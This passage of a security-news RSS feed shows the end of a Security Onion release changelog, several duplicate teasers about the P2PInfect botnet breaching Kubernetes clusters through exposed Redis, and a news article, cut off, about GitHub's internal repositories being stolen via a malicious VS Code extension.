<li>Management bond1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386610207" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15866" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15866/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15866">#15866</a></li>
<li>sanitize minion ids for hypervisor reactors / orchestration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386802339" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15867" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15867/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15867">#15867</a></li>
<li>cleanup status code by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4399955528" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15872" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15872/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15872">#15872</a></li>
<li>proc_creation per OS type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4406641405" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15875" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15875/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15875">#15875</a></li>
<li>New Sigma rules pipeline mapping for M365 and Fortigate by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marcopedrinazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marcopedrinazzi">@marcopedrinazzi</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4058000521" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15579" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15579/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15579">#15579</a></li>
<li>Initial commit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4429711477" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15880" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15880/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15880">#15880</a></li>
<li>add ingest latency metrics by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424558743" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15878" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15878/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15878">#15878</a></li>
<li>use temp files to prevent jq arg too long by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4431660697" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15883" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15883/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15883">#15883</a></li>
<li>rename strelka ScanLNK - ScanLnk by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432370753" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15884" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15884/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15884">#15884</a></li>
<li>remove stig from hypervisor and managerhype by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4438898463" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15887" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15887/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15887">#15887</a></li>
<li>Change Telegraf output from BOTH to INFLUXDB by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439336989" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15888" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15888/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15888">#15888</a></li>
<li>add zeek.ja4d ingest pipeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439952246" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15889" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15889/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15889">#15889</a></li>
<li>update redis index template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424358287" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15877" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15877/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15877">#15877</a></li>
<li>Fix module name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296261849" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15792" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15792/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15792">#15792</a></li>
<li>Tweak for nginx upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4449306658" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15894" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15894/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15894">#15894</a></li>
<li>Fix rename and password leaking into the log. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448868430" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15893" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15893/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15893">#15893</a></li>
<li>Make so-postgres-backup fail-safe against silent corruption by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454025326" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15896" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15896/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15896">#15896</a></li>
<li>exclude fps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455110621" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15898" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15898/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15898">#15898</a></li>
<li>use -verify flag during grid agent install to ensure agent health by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4449778193" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15895" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15895/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15895">#15895</a></li>
<li>Revert "use -verify flag during grid agent install to ensure agent health" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4460265212" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15899" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15899/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15899">#15899</a></li>
<li>sync elastic agent packages to fleet nodes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4478905100" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15902" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15902/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15902">#15902</a></li>
<li>Verify compatibility for all ES nodes in the cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488998540" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15907" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15907/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15907">#15907</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marcopedrinazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marcopedrinazzi">@marcopedrinazzi</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4058000521" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15579" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15579/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15579">#15579</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/Security-Onion-Solutions/securityonion/compare/3.0.0-20260331...3.1.0-20260521"><tt>3.0.0-20260331...3.1.0-20260521</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[P2PInfect Botnet Compromises Kubernetes Clusters Through Exposed Redis Instances]]></title>
<description><![CDATA[A well-known botnet is now targeting cloud environments in a more calculated way than before. P2PInfect, a Rust-written peer-to-peer malware active since mid-2023, has been observed compromising Kubernetes clusters by breaking into Redis instances left exposed to the internet. The…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3536644/it-security-nachrichten/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536644/it-security-nachrichten/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/</guid>
<pubDate>Thu, 21 May 2026 16:07:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A well-known botnet is now targeting cloud environments in a more calculated way than before. P2PInfect, a Rust-written peer-to-peer malware active since mid-2023, has been observed compromising Kubernetes clusters by breaking into Redis instances left exposed to the internet. The…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/">P2PInfect Botnet Compromises Kubernetes Clusters Through Exposed Redis Instances</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[P2PInfect Botnet Compromises Kubernetes Clusters Through Exposed Redis Instances]]></title>
<description><![CDATA[A well-known botnet is now targeting cloud environments in a more calculated way than before. P2PInfect, a Rust-written peer-to-peer malware active since mid-2023, has been observed compromising Kubernetes clusters by breaking into Redis instances left exposed to the internet. The campaign marks ...]]></description>
<link>https://tsecurity.de/de/3536354/it-security-nachrichten/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536354/it-security-nachrichten/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/</guid>
<pubDate>Thu, 21 May 2026 14:38:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A well-known botnet is now targeting cloud environments in a more calculated way than before. P2PInfect, a Rust-written peer-to-peer malware active since mid-2023, has been observed compromising Kubernetes clusters by breaking into Redis instances left exposed to the internet. The campaign marks a notable shift, moving from simple server infections to persistent footholds inside managed […]</p>
<p>The post <a href="https://cybersecuritynews.com/p2pinfect-botnet-compromises-kubernetes-clusters-through-exposed-redis-instances/">P2PInfect Botnet Compromises Kubernetes Clusters Through Exposed Redis Instances</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[P2PInfect Botnet Targets Kubernetes Clusters Through Misconfigured Redis Servers]]></title>
<description><![CDATA[Persistent P2PInfect botnet activity deeply embedded within Google Kubernetes Engine (GKE) clusters. In some cases, threat actors maintained their foothold for up to 6 months. The initial compromises stemmed from exposed and misconfigured Redis instances, which allowed the malware to establish a ...]]></description>
<link>https://tsecurity.de/de/3535501/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-clusters-through-misconfigured-redis-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535501/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-clusters-through-misconfigured-redis-servers/</guid>
<pubDate>Thu, 21 May 2026 09:52:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Persistent P2PInfect botnet activity deeply embedded within Google Kubernetes Engine (GKE) clusters. In some cases, threat actors maintained their foothold for up to 6 months. The initial compromises stemmed from exposed and misconfigured Redis instances, which allowed the malware to establish a highly resilient, peer-to-peer infrastructure quietly. While the botnet primarily focused on continuous beaconing […]</p>
<p>The post <a href="https://cyberpress.org/p2pinfect-targets-kubernetes-redis/">P2PInfect Botnet Targets Kubernetes Clusters Through Misconfigured Redis Servers</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[P2PInfect Botnet Targets Kubernetes via Exposed Redis]]></title>
<description><![CDATA[A persistent P2Pinfect botnet campaign targeting Google Kubernetes Engine (GKE) clusters through exposed Redis instances, highlighting how a single cloud misconfiguration can enable long-term compromise. In several investigated environments, attackers maintained access for up to six months, with ...]]></description>
<link>https://tsecurity.de/de/3535380/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535380/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/</guid>
<pubDate>Thu, 21 May 2026 09:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A persistent P2Pinfect botnet campaign targeting Google Kubernetes Engine (GKE) clusters through exposed Redis instances, highlighting how a single cloud misconfiguration can enable long-term compromise. In several investigated environments, attackers maintained access for up to six months, with consistent botnet activity detected through FortiCNAPP composite alerts. The intrusion chain began with publicly exposed Redis services, […]</p>
<p>The post <a href="https://gbhackers.com/p2pinfect-botnet-targets-kubernetes/">P2PInfect Botnet Targets Kubernetes via Exposed Redis</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[P2PInfect Botnet Targets Kubernetes via Exposed Redis]]></title>
<description><![CDATA[A persistent P2Pinfect botnet campaign targeting Google Kubernetes Engine (GKE) clusters through exposed Redis instances, highlighting how a single cloud misconfiguration can enable long-term compromise. In several investigated environments, attackers maintained access for up to six months, with ...]]></description>
<link>https://tsecurity.de/de/3535366/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535366/it-security-nachrichten/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/</guid>
<pubDate>Thu, 21 May 2026 09:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A persistent P2Pinfect botnet campaign targeting Google Kubernetes Engine (GKE) clusters through exposed Redis instances, highlighting how a single cloud misconfiguration can enable long-term compromise. In several investigated environments, attackers maintained access for up to six months, with consistent botnet…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/p2pinfect-botnet-targets-kubernetes-via-exposed-redis/">P2PInfect Botnet Targets Kubernetes via Exposed Redis</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-21 09h : 8 posts]]></title>
<description><![CDATA[8 posts were published in the last hour 7:4 : Police Arrest Dozens In Cyber-Fraud Crackdown 7:4 : P2PInfect Botnet Targets Kubernetes via Exposed Redis 7:4 : Dragonica Lunaris – 126,293 breached accounts 7:4 : Two U.S. Executives Plead Guilty…
Read more →
The post IT Security News Hourly Summary ...]]></description>
<link>https://tsecurity.de/de/3535364/it-security-nachrichten/it-security-news-hourly-summary-2026-05-21-09h-8-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535364/it-security-nachrichten/it-security-news-hourly-summary-2026-05-21-09h-8-posts/</guid>
<pubDate>Thu, 21 May 2026 09:08:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>8 posts were published in the last hour 7:4 : Police Arrest Dozens In Cyber-Fraud Crackdown 7:4 : P2PInfect Botnet Targets Kubernetes via Exposed Redis 7:4 : Dragonica Lunaris – 126,293 breached accounts 7:4 : Two U.S. Executives Plead Guilty…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-21-09h-8-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-21-09h-8-posts/">IT Security News Hourly Summary 2026-05-21 09h : 8 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub Confirms Cyberattack Targeting Thousands of Internal Repositories]]></title>
<description><![CDATA[GitHub confirmed that attackers associated with TeamPCP gained unauthorized access to thousands of the company’s internal code repositories after compromising an employee’s device through a malicious VS Code extension. Despite the scale of the GitHub cyberattack, the Microsoft-owned platform said...]]></description>
<link>https://tsecurity.de/de/3535230/it-security-nachrichten/github-confirms-cyberattack-targeting-thousands-of-internal-repositories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535230/it-security-nachrichten/github-confirms-cyberattack-targeting-thousands-of-internal-repositories/</guid>
<pubDate>Thu, 21 May 2026 08:04:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1204" height="686" src="https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="GitHub cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack.webp 1204w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-300x171.webp 300w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-1024x583.webp 1024w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-768x438.webp 768w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-600x342.webp 600w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-150x85.webp 150w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-750x427.webp 750w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-1140x650.webp 1140w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack.webp 1204w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-300x171.webp 300w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-1024x583.webp 1024w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-768x438.webp 768w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-600x342.webp 600w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-150x85.webp 150w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-750x427.webp 750w, https://thecyberexpress.com/wp-content/uploads/GitHub-cyberattack-1140x650.webp 1140w" sizes="(max-width: 1204px) 100vw, 1204px" title="GitHub Confirms Cyberattack Targeting Thousands of Internal Repositories 1"></p><span data-contrast="auto">GitHub confirmed that attackers associated with TeamPCP gained unauthorized access to thousands of the company’s internal code repositories after compromising an employee’s device through a malicious VS Code extension. Despite the scale of the GitHub cyberattack, the Microsoft-owned platform said there is currently no evidence that customer repositories or enterprise data were affected.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28349">cyberattack</a> on GitHub marks the latest operation linked to TeamPCP, a cybercriminal group that has rapidly expanded its activity through coordinated attacks on developer-focused platforms and cloud infrastructure. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Decoding the GitHub Cyberattack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">GitHub <a href="https://x.com/github/status/2056884788179726685" target="_blank" rel="nofollow noopener">publicly acknowledged the incident on Wednesday</a> after TeamPCP allegedly advertised stolen source code on a cybercrime forum. According to the company, the attackers attempted to extort the platform by offering the stolen code for sale at $50,000 and threatening to leak it publicly if no buyer emerged.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

[caption id="attachment_112192" align="alignnone" width="717"]<img class="size-full wp-image-112192" src="https://thecyberexpress.com/wp-content/uploads/GitHub-Cyberattack-Details.png" alt="GitHub Cyberattack Details" width="717" height="280"> Image Source: X[/caption]

<span data-contrast="auto">In a statement shared on X, formerly Twitter, GitHub said:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">“We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.”</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The company further stated:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">“If any impact is discovered, we will notify customers via established <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="28353">incident response</a> and notification channels.”</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">GitHub said the breach originated after an employee’s system was infected through a poisoned VS Code extension. The company described the incident as “detected and contained,” emphasizing that the compromise was restricted to internal repositories and did not extend to customer-owned <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28351">data</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">As part of its response to the GitHub <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28354">cyberattack</a>, the company rotated critical credentials on the same day the breach was discovered, prioritizing the most sensitive secrets first. GitHub also acknowledged that TeamPCP’s claim of stealing around 3,800 repositories was “directionally consistent” with the company’s own internal assessment regarding the scope of the intrusion.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The platform hosts code for more than 100 million developers globally, making the cyberattack on GitHub particularly significant within the software development and <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28350">cybersecurity</a> communities. GitHub said it plans to release a more detailed report once the investigation is complete.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">TeamPCP’s Growing Role in Cloud-Focused Cybercrime</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h3>
